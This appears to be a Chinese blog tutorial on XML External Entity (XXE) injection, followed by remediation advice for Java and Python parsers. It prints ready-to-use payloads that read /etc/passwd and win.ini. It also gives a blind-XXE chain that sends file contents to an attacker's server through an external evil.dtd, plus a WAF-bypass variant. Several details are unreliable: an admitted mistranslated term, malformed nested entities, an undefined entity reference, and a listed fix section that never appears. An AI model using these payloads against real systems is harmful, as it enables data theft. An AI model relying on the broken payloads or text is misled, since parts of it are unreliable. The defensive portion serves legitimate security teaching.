深入剖析 XXE 漏洞及其修复思路

一、XXE 漏洞是什么

二、XXE 漏洞的利用

（一）有回显的 XXE 漏洞利用

（二）无回显的 XXE 漏洞利用

三、XXE 漏洞修复思路

（一）禁用外部实体

（二）严格验证输入

（三）升级解析库版本

在网络安全领域，XXE（XML External Entity Injection）漏洞一直是一个不可忽视的安全隐患。今天，我们就来深入探讨一下 XXE 漏洞是什么、如何利用它以及最重要的，怎么修复它来保障系统安全。

一、XXE 漏洞是什么

XXE 漏洞通常发生在应用程序解析 XML 输入时。当应用程序没有禁止外部实体的加载，攻击者就可以利用这一漏洞，通过构造恶意的外部实体，获取服务器中本应被保护的数据。

产生 XXE 漏洞的原因主要在于文档类型定义（DTD）部分可以引用外部 DTD 文件，而且 XML 解析器解析外部实体时支持多种协议，比如file协议可读取本地文件内容，http协议能获取外部资源等。这就为攻击者打开了方便之门，他们构造的恶意 XML 文件一旦被解析器解析，就会触发漏洞。

二、XXE 漏洞的利用

（一）有回显的 XXE 漏洞利用

本地文件读取
- 利用file协议直接读取本地文件，例如在 XML 中定义外部实体：

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>

如果是 PHP 程序，还可以使用 PHP 伪协议读取文件流，像这样：

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <root>&xxe;</root>

当读取的文件包含特殊符号时，就需要借助sedate（这里文档表述不太准确，推测是类似处理方式），并结合外部参数实体来处理。同时要注意，有些 XML 解析库支持列目录，攻击者可借此获取更多敏感信息。

漏洞检测与利用演示
假设我们找到了一个接受 XML 输入的端点，比如某个登录接口。原本数据传输可能使用 JSON 格式，我们可以尝试将 HTTP 请求方法改为POST，并把Content-Type字段修改为application/xml。然后构造如下 XML 数据：

<!DOCTYPE root [ <!ENTITY test "hello"> ]> <root>&test;</root>

如果服务器能成功解析并回显hello，就说明该端点可能存在 XXE 漏洞。接着，我们可以进一步尝试利用外部实体读取文件，例如：

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]> <root>&xxe;</root>

若服务器回显了文件内容，那就证明存在 XXE 漏洞且可利用。

（二）无回显的 XXE 漏洞利用

无回显的 XXE 漏洞，又称为Blind XXE，利用起来相对复杂。因为服务器处理 XML 数据后不会回显，我们无法直接获取数据。这时，就需要借助外带数据通道来提取数据。

利用思路
- 首先定义一个实体，使用file协议请求本地文件内容，比如：

<!ENTITY % file SYSTEM "file:///etc/passwd">

再定义另外一个参数实体，将读取的文件内容作为 URL 的一部分，请求本地监听的端口。像这样：

<!ENTITY % payload "<!ENTITY send SYSTEM 'http://your_server_ip:port/?a=%file;'>">

然后通过外部 DTD 方式，将内部参数实体的内容与外部 DTD 声明的实体内容拼接起来。这里要注意参数实体的嵌套和引用顺序，因为同级参数实体内容几乎不会被 XML 解析器解析。例如：

<!ENTITY % start "<!ENTITY % send SYSTEM 'http://your_server_ip:port/?a=%file;'>"> %start; %send;

最后在 XML 文档中引用相关实体，启动本地监听端口（如使用python -m http.server 8998启动 HTTP 服务监听 8998 端口），若能在监听端口接收到包含文件内容的请求，就成功利用了漏洞。

绕过 WAF 的方法
有时候直接使用常规方式会被 WAF 拦截，我们可以尝试一些绕过技巧。比如，将 DTD 直接放在DOCTYPE中，不使用ENTITY关键字，像这样：

<!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % trick SYSTEM "http://your_server_ip/evil.dtd"> %trick; %send; ]> <root>&int;</root>

在evil.dtd文件中定义：

<!ENTITY % payload "<!ENTITY send SYSTEM 'http://your_server_ip:port/?a=%file;'>"> %payload;

通过这种方式，有可能绕过一些 WAF 的检测。

三、XXE 漏洞修复思路

（一）禁用外部实体

在 XML 解析器中，直接禁用外部实体的加载是最直接有效的修复方法。不同的编程语言和 XML 解析库有不同的设置方式。

Java
在 Java 中使用DocumentBuilderFactory时，可以通过如下代码禁用外部实体：

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python
使用lxml库时，可以这样设置：

from lxml import etree parser = etree.XMLParser(resolve_entities=False) xml_data = '<xml>...</xml>' # 实际的XML数据 tree = etree.fromstring(xml_data, parser)

（二）严格验证输入

对所有 XML 输入进行严格的验证，确保输入内容不包含恶意的外部实体声明。可以使用 XML Schema 或 Relax NG 等技术定义 XML 的结构和约束，验证输入的 XML 是否符合规范。
例如，使用 XML Schema 定义一个简单的 XML 结构：

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="root"> <xs:complexType> <xs:sequence> <xs:element name="data" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema>

然后在解析 XML 时，根据这个 Schema 进行验证：

import javax.xml.XMLConstants; import javax.xml.transform.stream.StreamSource; import javax.xml.validation.Schema; import javax.xml.validation.SchemaFactory; import javax.xml.validation.Validator; import org.xml.sax.SAXException; import java.io.File; import java.io.IOException; public class XMLValidator { public static void main(String[] args) { try { SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); Schema schema = factory.newSchema(new File("your_schema.xsd")); Validator validator = schema.newValidator(); validator.validate(new StreamSource(new File("your_xml.xml"))); System.out.println("XML is valid."); } catch (SAXException | IOException e) { System.out.println("XML is invalid: " + e.getMessage()); } } }